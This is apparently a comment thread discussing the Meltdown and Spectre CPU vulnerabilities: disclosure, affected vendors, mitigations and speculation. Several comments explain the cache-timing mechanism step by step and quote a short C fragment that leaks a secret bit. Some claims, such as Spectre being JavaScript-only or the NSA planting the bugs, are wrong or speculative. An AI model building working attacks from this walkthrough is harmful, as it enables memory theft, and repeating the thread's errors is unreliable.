This PoC is implemented in js, but my point stands regardless of the language used. It requires code executing on the same physical server as your app in order to be an issue for you. Similar to a hypervisor escape (since we're being pedantic yes, I understand this is not a hypervisor escape), the evil neighbor surface is not present if you have no neighbors.


I don't think you understand the bug here.

1) https://spectreattack.com/: "Spectre tricks other applications into accessing arbitrary locations in their memory. " Spectre does not let you execute code in another guest

2) Spectre is not javascript specific. I am not sure why you think it is, beyond the fact a PoC was written in js


I don't think you understand my point. You should reread my post, especially the first sentence. It's first and alone for a reason; not sharing hardware is an effective mitigation against vulnerabilities in shared hardware.

Obviously it's not just a js bug, there are other PoCs in other languages.

I never said anything about executing code in another guest, not sure where you got that from.


>Pretty hard to have a neighbor vm execute Spectre on your same physical server if you have dedicated hardware.

You have no reason to care about a neighbor VM executing Spectre on the same physical server, since they're only hurting themselves, not you.

>Add in that Spectre specifically is a js bug so in order to be vulnerable your server would need to execute untrusted JavaScript and I think we can assume the threat surface of this specific bug is smaller outside the cloud...

"Spectre specifically is a js bug"


Spectre is exploitable from processes, not just containers.... containers are equivalent to processes from it's point-of-view as the kernel is shared.

So... you may be able to go native to avoid having neighbours, but this does not prevent other processes exploiting your process. To do that you need to prevent any downloadable code from running.

This of course is possible and is the entire reason why the ARM document explains that most embedded systems are not affected due to the fact that they will not download and execute code (of any form).


Hmm, or maybe it's a reason to go with bare-metal providers :)


If true, how are edge computers going to connect to the cloud?


Chromebooks, obv. Integrated marketing strategy!


Also Android


Cloud services will benefit from this greatly.

Spectre occurs no matter you are in cloud or not, while cloud companies can advertise themselves to help customers proactively to mitigate such risks.


Did you forget the Technical University of Graz students who came up with rowhammer and KAISER in the first hand?


Not really, they are mentioned in the article. What is fascinating is the number of discoveries by the Google team. The Wikipedia page has a summary of the prominent ones: https://en.wikipedia.org/wiki/Project_Zero_(Google) these are not bugs in obscure pieces of software but on major services and operating systems.


Come on, Google completely "forgets" to mention the others, whilst the others do mention Google who detected it independently. And then look who wrote the papers, exploits and patches.


> Come on, Google completely "forgets" to mention the others

Err… fourth paragraph:

> Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at: Spectre (variants 1 and 2) Meltdown (variant 3)


Yuval Yarom's contribution (Flush+Reload) seems quite understated, considering how important it is to the attack.


I wonder how much of it relates to their mastery in data science.

I keep wondering if they got some “””AI””” fuzzer that helps them a ton? Plus tons of compute power to spend (remember SHA-256 clash they found “just because”?)


No collision has been found in SHA-256. SHA-1 is the broken hash function


So, as I gather, one of the main culprits is that unwinding of speculatively executed commands is done incompletely. That is something that the people doing the unwinding must have noticed and known. Somewhere the decision must have been made to unwind incompletely for some reasons (performance/power/cost/time).

As for the difference between AMD and intel. (From other posts here, not this one.) The speculative execution can access arbitrary memory locations on intel processors while this is not possible on AMD. This means that on intel processors you can probe any memory location with only limited privileges.

As for the affected AMD and ARM processors I'm none the wiser. How are they affected? Which models are affected? Does it allow some kind of privilege escalation? The next days will surely stay interesting.


You can't unwind completely. Once the cache is full, to load something on the cache, it has to evict something else. You might be able to evict what you just loaded, but you can't undo the earlier eviction.


Only if your speculative reads do cause irreversible side-effects on those caches. You could implement them in a way that doesn't modify the caches... but that would be complicated and probably use more power and have lower performance.


One of the main reasons for speculative execution is to fetch data into the caches ahead of them being needed. If you don't modify the cache, then you throw that away.

May be one way would be to use a smaller, separate cache for speculative execution and then copy that value to the regular cache once speculation is confirmed? This would add a one cycle latency for cache-to-cache transfer but there might be better ways.


This might actually improve performance because it would prevent actually-hot data being evicted from the cache in favour of cold data that was loaded in a not-taken speculated branch.


no need for cache-to-cache transfer, just like with invisible registers we could have cache line renaming


It is not enough. The cache line still need be evicted (or at least marked as no longer exclusive) from other cpus, so the side effect is still visible.


There does not need to be a performance hit, but cache complexity must rise: speculative execution must use a separate cache for any data that was fetched speculatively. Only when that branch is truly accepted must that data enter the "real" cache. As long as speculative execution does not go on for too long, these secondary caches can stay really tiny (a handful of cache lines maybe).


The "speculation time" can be hundreds of cycles if you have a branch or memory read that takes a long time to resolve.

This problem is already solved with speculative writes to main memory - a speculative store buffer keeps a sequence of memory operations which need to be done when the operation retires. These buffers are very power hungry, because every future speculative read must check every entry in the speculative store buffer to see if it is re-reading a previously written address. That many to many mapping leads to an exponential amount of checking logic.

The same could be done for cache reads/writes, but I have a feeling it would quickly get very complex, large, and power hungry.


Those hundreds of cycles of speculative execution can't include more than a handful of cache modifications though, because a change to the caching state implies a miss in the speculated execution itself. So you can't have more than a small number of those before the original stall is over and the misprediction resolved.


What you are describing is sinply plain associative memory. If I remember correctly, this is complex in its imolementation, but does not grow exponentially. Plesse correct me if I am wrong.


fully associative memory is generally very power hungry.

Thats why in CPU's caches are usually "2 way associative" or "4 way associative".

That means the data you're looking for might be in one of 2 (or 4) places. Fully associative means the data you're looking for might be in any memory slot, and you're gonna have to check them all. Checking them all in parallel is possible, so it isn't a speed issue, but it is a massive power issue. Average power use is the main limiting factor in CPU's today.

In general in a CPU, transistors which stay in the same state don't use much power. Transistors changing state use power. In a fully associative memory, the transistors doing the comparing change state with every comparison. Whereas with a regular memory only the transistors for the individual bit of the memory being read or written change state and use power.

(the above is a simplification, but contains the key elements).


Associative memory is a huge matrix of and gates in the comparator. But we are talking about buffering results of speculated reads after a predicted branch.

The density if load instructions in code is not particularly high on average. Also, all loads are subject to the same latencies, so that the chance that a speculative read completes before the blocking one is also low (must be cached in a higher level cache, I think).

Taken together, I would be surprised if more than about 10 speculative reads can successfully complete at all in that time frame, even though it is hundreds of cycles. So that would be around 1000 and gates and 1000 memory cells. Doesn't sound too big to me.


Unclear. From the Spectre paper:

More broadly, potential counter- measures limited to the memory cache are likely to be insufficient, since there are other ways that speculative execution can leak information. For example, timing ef- fects from memory bus contention, DRAM row address selection status, availability of virtual registers, ALU ac- tivity, and the state of the branch predictor itself need to be considered.

... also ...

Of course, speculative execution will also affect conventional side channels, such as power and EM

Historically I think it's been assumed that you can't extract much useful information from a modern speculating CPU via EM radiation, but these attacks constantly seem to be surprising people. Re-programming a wifi chip to monitor interference generated by the CPU to spy on speculation? It would have sounded like a pie in the sky fantasy ... yesterday.


I will be highly impressed if anyone managed to pull of a reliable and generic side channel attack based on the hardware you listed. Most of what you describe is squarely in the realm of tinfoil hattery.

DRAM and the memory bus is also affected by DMA operations running independently of the CPU.

Power consumption? There is no hardware available to measure that, let alone at the time resolution required. If you have to first attach a GHz bandwidth oscilloscope to the computer you might as well just reboot it or dump its RAM contents or whatever.

Forget about reprogramming a Wi-Fi chip. They operate on narrow channels in the 2.4GHz range and have fixed hardware for modulation. You would at least have to force the CPU to switch to the right frequency and then be lucky enough that it radiates a signal that demodulated to something sensible within the Wi-Fi hardware. This is physically impossible on current hardware.

Also, on a different note, we cannot sacrifice performance willy-nilly for the sake of a bit of potential security gains. A 30% performance loss on servers means that the counter move is to consume 30% more power to maintain current levels of operation in a data center. This energy needs to be generated, which means that someone is burning oil or gas for it with all the consequences. In essence, the current patches will result in an extra thousands or millions of tons of CO2 in the atmosphere. More efficient replacement hardware will eventually produced with extra environmental impact. We need to find ways to avoid that. Soon.


https://spectreattack.com/

Information site with some more information, and links to papers on the two vulnerabilities, called "Meltdown" and "Spectre" (with logos, of course).

(https://meltdownattack.com/ goes to the same site)


Both domains were registered on 2017-12-22. Given the planned disclosure on 9th January that Google mentions and MS and others coding patches silently [1], do the early reports [2] of kernel patches, does this mean that due to coding in the open the whole disclosure procedure has been vastly accelerated?

I wonder how the timing relates to New Year and many companies having holidays in CW1.

[1] https://lists.freebsd.org/pipermail/freebsd-security/2018-Ja...

[2] https://news.ycombinator.com/item?id=16046636


Accelerated, but not vastly. Google's post says "We reported this issue to Intel, AMD and ARM on 2017-06-01", so the embargo still ended up holding for 7 months, even with it ending a week early. The domain registration dates of 2017-12-22 seem to be just when Google started to prepare for releasing the publicity materials, not when the vulnerability was discovered.


The Google Security Blog post actually says that the open development did not cause the early breakdown of the embargo in the last 1-2 hours, but

> We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming.


The problem isn't "it's not bought forward by that much relatively" in as much as you have an agreed timeline to have coordinated patches (e.g so one org doesn't push a fix before other orgs have). So if you have a bunch of orgs set up to do a release on day X, and then publish on X-[whatever] then you are effectively zero-daying.

Is it super important in this case? shrug.

But imagine for the sake of argument there was some undocumented cpu behaviour "if instruction x,y,z are executed in that order with these constants then catch fire", then having anyone pre-empt the agreed update time could be bad.


Sorry to be daft, but hasn't the Google Zero team jumped the gun on the coordinated disclosure date by publishing their blog post 6 days in advance?


Some researchers had independently create and demonstrated working PoC based on the linux patches they saw which read kernel memory from user space. At that point it was already public.

After that its all about PR and getting people prepared for the magnitude and impact early.

Also to let people know that patches that were already available can be used (restarting GCP/AWS instances, SPI on chrome).


I feel like the Meltdown logo was done by a real designer, and Spectre was designed by a bored developer.


From the site:

> Both the Meltdown and Spectre logo are free to use, rights waived via CC0. Logos are designed by Natascha Eibl.


It says at the bottom they were both done by the same person.


That's funny, but also makes me wonder how you get contracted to do logos for things like this. Based strictly on her LinkedIn, she doesn't work for Google. Maybe a friend of someone? Kind of a cool gig though.


https://www.linkedin.com/feed/update/urn:li:activity:6354450...

says:

> Want to know what's really going on with the Intel security flaw everyone is talking about? Checkout https://meltdownattack.com to get all the details. This is my boyfriend's and his research team's latest work. An huge security breach which affects nearly all your computers! Stealing all your secrets never was that easy!


I thought the presence of a branch in the logo was clever.


I just noticed that. That is pretty clever.


It seems that Richard Stallman is not so paranoid after all:

> I am careful in how I use the Internet.

> I generally do not connect to web sites from my own machine, aside from a few sites I have some special relationship with. I usually fetch web pages from other sites by sending mail to a program (see https://git.savannah.gnu.org/git/womb/hacks.git) that fetches them, much like wget, and then mails them back to me. Then I look at them using a web browser, unless it is easy to see the text in the HTML page directly. I usually try lynx first, then a graphical browser if the page needs it (using konqueror, which won't fetch from other sites in such a situation).

Ref: https://stallman.org/stallman-computing.html


[flagged]


>RMS remains a rambling nutjob and none of this is really applicable to the issue at hand.

Ramblings that this industry has repeatedly proven to be correct, and continue to do so. I'd take his ramblings over a cheap ad hominem any day.

I encourage you to try being more civil the next time you comment on this site.


A "rambling nutjob" that has been proven correct time and time and time again.

We need more people with RMS-type views in Google, Facebook, etc.


The spectre attack is exploitable via javascript and there's no software patch that can fix it. IoW, it is not possible to safely run untrusted code in the same computer that has sentitive information.


Well he was right about the Intel ME vulnerabilities


Speculative execution seems like something that would be very intuitively insecure even to a layperson(relative to the field of course).

I'm wondering, was this vulnerability theorized first and later found out to be an actual vulnerability? Or was this something that nobody had any clue about?

I'm only saying this, because from a security perspective, I imagine somewhere at some point very early on someone had to have pointed out the potential for something like speculative execution to eventually cause security problems.

I just don't understand how chip designers assumed speculative execution wouldn't eventually cause security problems. Is it because chip designers were prioritizing performance above security?


Long time ago, in a far away office park there was an intense discussion over so called "flag early" and "flag after" designs.

Flag early camp argument was - protected pages should not be allowed to be fetched to begin with by any insecure execution flow, and we need to pagefault before speculative execution

The "flag after" camp was all for post-factum pagefaulting when the branch has finished execution, so you do not need to pagefault for every branch, and only do it for the branch that has "won"

Chip design magazines from nineties has all that well covered.


Speculative execution isn't supposed to leak information; if the speculative instructions aren't supposed to execute, all traces of them should be rolled back. I'd be curious to see what the details of this bug really are. I'm not sure how much will be disclosed in the interests of keeping exploits from popping up.


"all traces" includes timing differences in execution of non-privileged code, which it turns out are not rolled back.


Or side-effects by loading data into the cache hierarchy.


According to this comment, it has been theorized for quite some time:

https://news.ycombinator.com/item?id=16066165

With this particular computer scientist, who talked about this problem before, referenced in Google's paper:

http://www.cs.binghamton.edu/~dima/



Incredible that in this day and age that chip designers do not prioritize performance over security.


I think the chip designers never thought of security much:

https://news.ycombinator.com/item?id=16062223

It's a similar situation to other timing attacks, which have been around practically as long as caches.


I don't think this is the last we have seen of side-channels, it's just a ridicolously hard problem to get right. And for that reason I can't feel too angry at the procesor makers.

And I certainly expect to see more things like this (but at least hopefully with lower bandwidth).



Wow so intel comes and says what is all the panic about there is nothing wrong (despite knowing this) and then amazon drops the we are updating everything right now bomb and then google drops the mother of all cpu bugs. In a previous thread someone was asking if it really is all that bad and at this point I think it’s safe to say that yea, it is.


So, is AMD effected or not? This seems fairly important. The Google blog post sort of goes against itself in this regard. AMD itself has said:

"The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time."

So either AMD is lying or Google's blog post is wrong. Granted AMD's statement is a bit muddled, not sure if they mean they aren't susceptible to all THREE variants (as in only 1/3) or they aren't susceptible to ALL three variants (as in none of them.)


As almost everyone seems to be getting this wrong: It's "affected", not "effected". "effected" means roughly "caused", while "affected" means roughly "influenced".


AMD is saying that:

  !(susceptible_v1 && susceptible_v2 && susceptible_v3)
They are not saying that:

  !susceptible_v1 && !susceptible_v2 && !susceptible_v3
(the latter would be rendered in English as: "AMD is not susceptible to any of the the three variants")


You've successfully made it less clear.

There is a nice table on AMD's website though:

https://www.amd.com/en/corporate/speculative-execution


It seems like it is not affected by the most serious bug, but may be by a lesser one.


That's what I'm thinking, effected by Spectre, but not by Meltdown. But more clarity would be appreciated on Google and AMD's front. I mean from a pure PR angle, AMD has a lot to gain if they can clear the air more.


it is effected by spectre, but not by the other.


From the Spectre paper-

We have empirically verified the vulnerability of several Intel processors to Spectre attacks, including Ivy Bridge, aswell and Skylake based processors. We have also verified the attack’s applicability to AMD Ryzen CPUs. Finally, we have also successfully mounted Spectre attacks on several Samsung and Qualcomm processors (which use an ARM architecture) found in popular mobile phones.

So in other word, the researcher haven't tried it on AMD processors, but they think the attack would work. AMD, on the other hand, is saying the attack won't work.

Frankly, I believe in PoC||GTFO, so AMD is safe in my book for now.


Spectre and Meltdown are two different exploits. In this case, the paper is talking about Spectre and they did have a POC that worked on all three major processor families (except for deterministic execution engines in microcontrollers and low end CPUs from ARM as well as a few early Atoms from Intel). AMD is saying that Meltdown, which at first glance seems like the most serious one, doesn't effect their processors.


I read the Spectre paper front to back. Where did the paper mention that they have a working PoC for AMD x86 CPUs?


That seems like a rather fragile interpretation of the statement. I had interpreted it to mean they tried the attack on Ryzen and it worked. Given the general nature of their technique why would it not work on AMD chips?


Can someone with a little more experience this low-level let me know if this is as bad as I think it is?

Because this looks real bad:

> Reading host memory from a KVM guest


"We wrote a JavaScript program that successfully reads data from the address space of the browser process running it."

Yeah, it's pretty bad.


A perfect occasion to invite others into my current exercise of using the web without JavaScript.


...and for those of us who leave JS off by default except for a few very trusted sites, the bar for turning on JS on a site that asks to just went up a lot higher.



So is speculative execution just inherently flawed like this, or can we expect chips in 2 years that let operating systems go back to the old TLB behavior?


Yeah I was wondering this myself. Even if there's some fiddly hardware fix to make speculative execution secure, how much of its performance gains will we have to give up to get there?


Speculative execution as a concept should not be flawed. My take is that the results of illegal speculation should never be leaked in a visable way.


As I read through the meltdown paper, it looks really difficult to have the security we want and the performance we want at the same time. It's pretty crazy, but here's my limited understanding:

There's a huge shared buffer between two threads. 256 * 4K. One thread reads a byte of kernel memory, literally any byte it wants, and it then reads one of those 4K pages from that buffer in order to cache that one memory page that corresponds to the byte it just read. Then at some point the CPU determines that the thread shouldn't be permitted to access the kernel memory location, and rolls back all of that speculative execution, but the cached memory page isn't affected by the rollback.

The other thread iterates through those 256 pages, timing how long it takes to read from each page, and the one page that Thread A accessed will have a different (shorter?) timing because it's cached already. It now understands one byte of kernel memory that it shouldn't. That's just one byte but the whole process is so fast that it's easy to just go nuts on the whole kernel address space.

So what would the fixes be? Disable speculative execution? Only do it if the target memory location is within userspace, or within the same space as the executing address? Plug all of the sideband information leak mechanisms? I dunno.


Keep a small pool of cache lines exclusive to speculative execution, discard when non taken, rename affected cache lines (like register renaming so no copy) when taken.


Also, separate BTB for each process and privilege level.


Yes, this would have a bonus effect of actually gaining IPC in multi process loads.


In the simplest Meltdown case, the offending instruction is really executed and a General Protection Fault occurs. That is handled in the kernel which at that point could (simply?) flush all caches to remove the leaked information.

The real problem with Meltdown seems to occur when: 1) The offending instruction is NOT really executed because it is in a branch which is not actually taken. 2) The offending instruction is executed but within a transaction, which leads to an exception-free rollback (with leaked information left in cache though).

AFAIK neither is (or can be made) visible to the kernel (which could explain the very large PTI patch), but I do wonder if they are events that can be hanlded at the microcode level, in which case a microcode update from Intel could mitigate them.


The MELTDOWN one is the easy one (as is evident by the fact that this is the one that only seems to affect Intel CPUs).

When a load is found to be illegal, an exception flag is set so that if the instruction is retired (ie. the speculated execution is found to be the actual path taken), a page fault exception can be raised. To prevent MELTDOWN, at the same time that the flag is raised you can set the result of the load to zero.

SPECTRE is the really hard one to deal with. Part of the solution might be providing a way for software to flush the branch predictor state.


Maybe separate BTBs. Or maybe disable branch target prediction when in kernel mode (but then some VM process may still observe some other process running inside a different VM via a side channel).


Not allow user processes to recover from a SEGV. The attack depends on a signal hander that traps the signal and resumes execution. If this is disabled then the attack will not work. This would affect two types of systems:

1. Badly written code where bugs are being masked by the handler. 2. Any kind of virtualization?

So, for cloud providers it looks like a 30% performance hit, but for the rest of us I would rather have a patch that stops applications handling the SEGV trap.


The attacks do not rely on recovering from SIGSEGV. The speculated execution that accesses out-of-bounds or beyond privilege level happens in a branch that's predicted-taken but actually not-taken, so the exception never occurs.


Ah, ok - then I read the paper wrongly. i’ll go back and have another look.

Edit: yes, I missed the details in section 4.1 when I skimmed through. I’m not familiar with the Kocker paper, but I assume the training looks like this?

for(int i=0 i<n; i++) if(i==n-1) do_probe();


After thinking about this I think you may be right. It might be hard (or impossible to do in practice).

> or within the same space as the executing address

That's probably a good place to start from. I'm guessing there still would be issues here with JITed code coming from a untrusted source.


I can imagine some ways to armor the branch predictor, similar in principle to how languages like Perl have to include a random seed in their hash code (in some circumstances) to avoid being able to pre-compute values that will all hash to the same thing [1]. There should be some ways to relatively cheaply periodically inject such a randomization into the prediction system enough to prevent that aspect of the attack. This will cost something but probably not be noticeable to even the most performance-sensitive consumers.

But no solution leaps to mind for the problem of preventing speculative code from leaking things via cache, short of entirely preventing speculating code from being able to load things into the cache. If nobody can come up with a solution for that, that's going to cost us something to close that side channel. Not sure what though, without a really thorough profiling run.

And I'd put my metaphorical $5 down on someone finding another side channel from the speculative code; interactions with changing processor flags in a speculative execution, or interaction with some forgotten feature [2] where the speculation ends up incorrectly undone or something.

Yuck.

[1]: https://blog.booking.com/hardening-perls-hash-function.html

[2]: https://www.youtube.com/watch?v=lR0nh-TdpVg - The Memory Sinkhole - Unleashing An X86 Design Flaw Allowing Universal Privilege Escalation (Dec 29, 2015)


I'm thinking you might be right.

It's going to be really hard to give up real world gains from branch prediction. Branch prediction can make a lot of real world (read "not the finest code in the world") run at reasonable speeds. Another common pattern to give up would be eliding (branch predicting away) nil reference checks.

> short of entirely preventing speculating code from being able to load things into the cache

Some new server processors allow us to partition cache (to prevent noisy neighbors) [1,2]. I don't have experience working with this technology but everything I read makes me believe this mechanism can works on a per process basis.

If that kind of complexity is already possible in CPU cache hierarchy I wonder if it's possible to implement per process cache encryption. New processors (EPYC) can already use different encryption keys for each VM, so it might be a matter of time till this is extended further.

[1] https://danluu.com/intel-cat/

[2] https://lwn.net/Articles/694800/


This rant/thread is a good reading as well: https://lkml.org/lkml/2018/1/3/797

It's possible to key the cache in the kernel on CPL so at least there should be no user / kernel space scooping of cache lines.

It's possible we can never fully prevent all attacks in same address space. So certain types of applications (JIT and sandboxes) might forever be a cat and mouse game since we're unlikely to give up on branch prediction.


AFAICT injecting any sort of delay that prevents this attack would also completely negate any benefit from caches and that would take us back to 2000s performance at best, even with 10-16 core Xeon monsters. The branch predictor is really just a glorified cache prefetcher so you'd not only have to harden the branch predictor but anything that could possibly access the cache lines that the branch predictor has pulled up.


"The branch predictor is really just a glorified cache prefetcher so you'd not only have to harden the branch predictor..."

I was just thinking of the part they were talking about where it was too predictable, not the rest of the issues. Instead of a single hard-coded algorithm we could switch to something that has a random key element, like XOR'ing a rotating key instead of a hard-coded one, similar to some of the super-basic hashing some predictors already do. Prefetching I just don't know what to do with. I mentally started down the path of considering what it would take for the CPU to pretend the page was never cached in the first place on a misprediction, but yeow, that got complicated fast, between cache coherency issues between processors and all of the other crap going on there, plus the fact that there's just no time when we're talking about CPU and L1 interactions.

Timing attacks really blow. Despite the "boil the ocean" nature of what I'm about to say, I find myself wondering if we aren't better served by developing Rust and other stronger things to the point that even if the system is still vulnerable to timing attacks it's so strong everywhere else that it's a manageable problem. Maybe tack on some heuristics to try to deal with obvious hack attempts and at least raise the bar a bit. More process isolation (as in other links mtanski gives you can at least confine this to a proces). (What if Erlang processes could truly be OS processes as far as the CPU was concerned?) I'm not saying that is anything even remotely resembling easy... I'm saying that it might still be easier than trying to prevent timing attacks like this. That's a statement about the difficulty of fixing timing attacks in general, not the easy of "hey, everybody, what if you just wrote code better?", a "solution" I often make fun of myself.


Only on Intel. Others restrict prefetches on permissions.

I think this might even be fixed by microcode patches on Intel, at least os specific, looking at the first address bit.


If they could have done microcode patches they would have done, suggesting they can't.


Suse already has them.

I guess Intel only focused on Windows NT for several months, and there it's not so easy as on Linux.


So this confirms the suspicion that the bug allows VM-to-VM disclosure of memory, which would conclusively explain the rush.


What are the odds that the NSA already knew about this? Roughly 100%?


This is a toughie. These bugs are basically very difficult to mitigate completely without fixes at the hardware level. One might imagine the NSA being coy and patching their own OS's et al to the degree they can while working to exploit the bug in the wild. However, the reality is that this bug is almost worse for the NSA than for most other folks, because they have the most to lose if their security is breached. And they have a lot of machines out there. The idea of a bug of this severity that leaves no traces is probably leaving a lot of people at the NSA in cold sweats right now. Meaning that if they did discover it before other researchers it's questionable whether they would have tried to exploit it vs. driving towards the most rapid possible mitigation and fix.


Pretty close to 100%.

Google zero and academia researchers found it independently, following some talk about the concept a while back.

The 3 letters agencies have people of the same calibre working full time on that. They could find it too.


I dunno. Potentially. But these are incredibly complicated bugs, which involve timing at the hardware level. There's nothing close to this in the Vault7/8 leaks.


If I were a betting man, I'd place my bet on them knowing about this for a long time, and possibly even being behind the bugs' introduction in the first place


I'm not familiar with the intricacies of CPU design. What are the odds the NSA somehow arranged for these vulnerabilities to exist?


I believe most crypto exchanges are running in the cloud. What could possibly go wrong ?


I just sold all my altcoins for BTC on Binance as soon as I saw this and transferred them to gdax. Hopefully I can sell them for USD on gdax and transfer to a real bank before they get hacked.


Why would you do that? If you are concerned for the security of your coins, you should have moved them to a wallet you own that is not hosted on an exchange. The bank you transfer your dollars to is just as likely to get hit by the exact same vurnerability. In addition you have to pay a fee to move your coins, then to wire the dollars to your bank account. Moving from crypto to fiat is also liable to taxation. If the sole goal is to secure your coins then I don't think that the whole process is worth the hassle. Moving them to a private wallet would suffice.


> Moving from crypto to fiat is also liable to taxation

Trading between cryptoassets as GP suggests he has done already makes them subject to taxation. The fiat step isn’t needed.


Most banks don't use cloud providers AFAIK.

Also, real money transactions are much more likely than blockchain transactions to be reversible if fraudulent.


The majority of coins on Coinbase are in cold-storage and crypto on Coinbase is insured against this type of breach. I personally wouldn't panic to get my coins out.


There was an announcement not long ago saying they are not insured.


Can you reference that? The CoinBase support page currently says crypto is insured against security breaches on their end.


Crypto in their hot wallets, or crypto in cold storage?


at least the dollars are insured ;-)


So, basically CPUs will read instructions inside a branch even if the branch is eventually going to evaluate to false. Does the CPU do this to optimize branch instructions? The results of instructions that are executed ahead of time are stored in a cache. How exactly does this exploit read from the cache? I understand it uses timing somehow but I'm not quite sure exactly how that works. (I mostly do software.)


The cache in question is not something which stores the result of these speculatively executed instructions, but the normal L1-L2-L3 caches we are used to. The result of these instructions is discarded, but as a side effect, they may load something from memory into the cache. The exploit detects whether or not a particular memory address was loaded into the cache (reading from something already in the cache is much faster than reading from the main memory).


Thanks for the helpful answer. :) Things make much more sense to me now.


It's a timing attack against the cache. The speculative execution might need to do a read, which means something would need to be evicted from the cache. This makes a subsequent read against that evicted adres slower.

This way you can detect things based on speculative execution. I don't know how they go from that to reading memory though.


> I don't know how they go from that to reading memory though.

That was the second bit of the example source code:

unsigned long index2 = ((value&1)*0x100)+0x200;

This creates one of two different addresses, depending upon the value of bit zero of the memory location being attacked. The two different addresses are farther apart than the size of a cache line.

> unsigned char value2 = arr2->data[index2];

This actually does the read from one of the two different addresses (which results in the value located at one of them becoming resident in cache). Note that the value returned here is a "don't care" item.

Then, after everything unwinds from the speculation, the follow on code on the real path would read from both of the two possible addresses that were put into "index2". The read that returns data faster must have been in cache. Knowing which one was in cache, you now know the value of bit zero of the target address location.

Repeat the same block of code for bits 1-7 and you'll have read a whole byte. Continue and you can read as much as you like. You just gather data very slowly (the article mentioned about 2000 bytes per second).


Ah, that makes sense, thanks!

I was thinking of something similar but with a branching operation, but that would get screwed by branch prediction.


You arrange things so that the speculated execution loads from an address you provide (this is the target address you want to read), then uses the result of that load to calculate the address of another load (this one, into a location that aliases in the cache with an address you can load directly yourself).

You can then use cache timing to see which address was read in the second load, which means you can see part of the value that was read in the first load. Rinse, repeat.

The variants mostly amount to differences in how you arrange the first part (speculated execution loading from an address you get to provide).


First implementation I've seen on twitter.

https://twitter.com/pwnallthethings/status/94869396135866777...


One of the meltdown paper writers evidently has a sense of humor since "hunter2" [0] is one of the passwords they use in their demonstration [1]

[0] http://bash.org/?244321

[1] https://meltdownattack.com/meltdown.pdf (page 13, figure 6)


hunter2 is the industry's accepted PoC password.


wasn't it dolphin?


A previous client used this, i always wondered.


So what exactly are they going to do about spectre? Seems pretty unstoppable from what I can see.

Can they disable speculative exec completely for sensitive boxes or is this too baked in?


There's no mitigation. We'll need new CPUs.

Meanwhile, don't ever run untrusted code in the same process as any kind of secret. Better yet, don't ever run untrusted code.


I wonder what fraction of data inside a kernel is really ‘private’.

Obviously we want 100% of the data in the kernel not to be writeable, but if only a small amount shouldn’t be accessible at all then maybe the long term solution is to handle that data in a special way. Something that makes using it slower but doesn’t make every other syscall suffer as much as a consequence.

Or maybe the solution is to prioritize moving more and more code into userspace.


Well the good news is that now microkernels can take over. With KPTI (also known as FUCKWIT), a syscall is now as expensive as a context switch to another userland process.

Of course, that means now monolithic kernels run just as slow as microkernels.



I've read them — but the important factor is that Linux with KPTI is now doing a full context switch between userland and kernel, which is the same cost as switching to another userland process to handle the syscall (which is exactly what a naive microkernel would do).

I've always been a proponent of microkernels, and this is another situation that might help with this.

(Personally, I've been affected by the failures of monolithic kernels way too often. When a simple OpenGL or WebGL program manages to hang your GPU driver, parts of the kernel, and all DMA operations in the kernel, and your system becomes unusable, then reasonable isolation would be preferable)


Recent Intel CPUs have PCID (TLB tagged by process ID), which makes KPTI not much slower than what we had last week.


Hypervisors and containers already blur this line. I think we were heading there anyway.

But a microkernel is going to have multiple processes talking to each other, so there will still be more overhead whenever a message requires coordination between more than two processes.


The performance differential is a concern with classical microkernel designs but not really with modern ones. The process isolation is useful when dealing with Meltdown but not with Spectre.


I wondered that. But it's really hard. My guess is that most of it needs to be read protected.

Consider:

• Network packet buffers? Yes.

• Graphics driver command buffers? Yes.

• Disk caches? Yes.

• Kernel pointers of any kind? Yes if you care about KASLR.

It's actually kind of hard to think of data in the kernel that shouldn't be read protected.


>We'll need new CPUs.

I don't think that's an option either.


Can someone more knowledgeable than me in regards to this vulnerability tell me:

1. How to best protect my local personal data from being subject to this?

2. Whether I should seriously consider pulling all my cryptocurrency off of any exchanges?


from my understanding:

1:

- install security updates for your OS - if it's not ready yet: disable JavaScript in your browser by default and enable it only for resources you trust. otherwise just skip the page. execute third party code with extra caution. any suspicious code should go away (even not inside vm)

2: as long as it's stored in a wallet on your own hardware which you fully control, it should be safe enough


2. Don't ever store large values of cryptocurrency on an exchange. Keep them offline in paper or hardware wallets.


So how much legal liability are they exposed to due to this security flaw?

Since this affects legacy systems that may not be able to be upgraded it seems like this issue will be around for a very long time.


Since this affects legacy systems that may not be able to be upgraded it seems like this issue will be around for a very long time.

It also only affects "legacy systems" which routinely run nontrusted code. If it's something like e.g. a server in a bank, chances are everything running on it has already been accounted for. This isn't like e.g. Heartbleed where you could just connect to any open server and read its memory --- you have to somehow get your code to run on it first.


Really makes the case against going to the "cloud" (using hosted VM solutions) versus just using colocated servers running VMWare that you fully own and administer.


However, since it seems like there is not much anyone can do to identify what is being leaked and what process did it, this does increase the risk that someone might exploit this internally and get away with it.


I can't understand this paragraph from [1]:

> Cloud providers which use Intel CPUs and Xen PV as virtualization without having patches applied. Furthermore, cloud providers without real hardware virtualization, relying on containers that share one kernel, such as Docker, LXC, or OpenVZ are affected.

I take it to imply that hypervisors that use hardware virtualization are not affected. However, the PoC that reads host memory from a KVM guest seems to contradict this.

Is it because on Xen HVM, KVM, and similar hypervisors, only kernel pages are mapped in the address space of the VM thread (so a malicious VM cannot read memory of other VMs), but on these other hypervisors, pages from other containers are mapped? Yet the Xen security advisory [2] says:

> Xen guests may be able to infer the contents of arbitrary host memory, including memory assigned to other guests.

Relatedly, what sensitive information other than passwords could appear in the kernel memory? I'd expect that at the very least buffers containing sensitive data pertaining to other VMs may be leaked.

[1] https://meltdownattack.com/ [2] https://xenbits.xen.org/xsa/advisory-254.html


The kernel memory map generally includes the 'direct map' of all physical memory - so, everything that is resident is potentially at risk.


> Meltdown breaks all security assumptions given by address space isolation as well as paravirtualized environments and, thus, every security mechanism building upon this foundation.

> On affected systems, Meltdown enables an adversary to read memory of other processes or virtual machines in the cloud without any permissions or privileges, affecting millions of customers and virtually every user of a personal computer.


Reading over this.... it sounds like ultimately the exploit in Linux still only works thanks to being able to run stuff in the kernel context through eBPF?

